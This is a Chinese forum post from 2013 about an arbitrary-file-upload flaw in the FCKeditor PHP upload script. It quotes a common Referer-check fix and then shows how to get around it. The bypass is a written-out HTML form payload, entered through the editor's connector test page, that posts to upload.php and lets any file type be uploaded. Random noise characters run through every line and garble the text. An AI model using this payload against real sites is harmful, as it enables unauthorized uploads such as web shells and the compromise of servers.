漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
# N! ?- I! Q2 B: j/ }网上给出的修复方案是
`0 [5 S5 Z7 x+ Y修复方法,删除FCK编辑器用其他的编辑器# Z6 c; ^3 I. ?$ n
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
/ D$ T: ?5 ]- M2 L在3 m: u7 |, c4 y- L Y% G$ t
require(‘config.php’);- |3 ]: a1 c T$ s- h
require(‘util.php’);& t- D$ V! z, ]# M! X
的下面添加以下代码—————————–/ ~8 r3 o( U5 L# D3 Z# q
//防止外部提交) h9 H* ?' z& G* a! @
function outsidepost()
. r6 g4 _2 J+ @{( B- m* N9 I% d6 J
$servername=$_SERVER['SERVER_NAME'];
$ y6 o0 T2 F" L$sub_from=@$_SERVER['HTTP_REFERER'];4 J6 [- ] j7 N: ?
$sub_len=strlen($servername);
2 p1 q6 P8 l3 S0 |$checkfrom=substr($sub_from,7,$sub_len);% c9 o2 c8 y7 i
if($checkfrom!=$servername){1 [) S3 k3 u" C; z0 W/ z3 M* \0 u
echo(“you don’t outsidepost!”);4 d4 C% N6 _0 d5 A
exit;1 M5 k1 U* q* O- W
}
2 l, E0 q/ t' K$ j+ \1 A}, c: }* i, B" a: u Q# @) x
outsidepost();# Z! h% A& ~- ^+ ]0 E# @
防止外部提交,但是没有防止内部提交,
) G5 N7 ~2 y& p. e& F! n利用方法:
% b9 Y! \4 W# x' X) B1 P% C5 X3 k1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
- B2 A) K7 v2 B' q9 o; U- k2,在Current Folder 框输入7 r& C: K" E0 ?6 {1 N
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>! k* O: l7 _0 \* @
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
1 U" ^: V4 \, G. ]PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对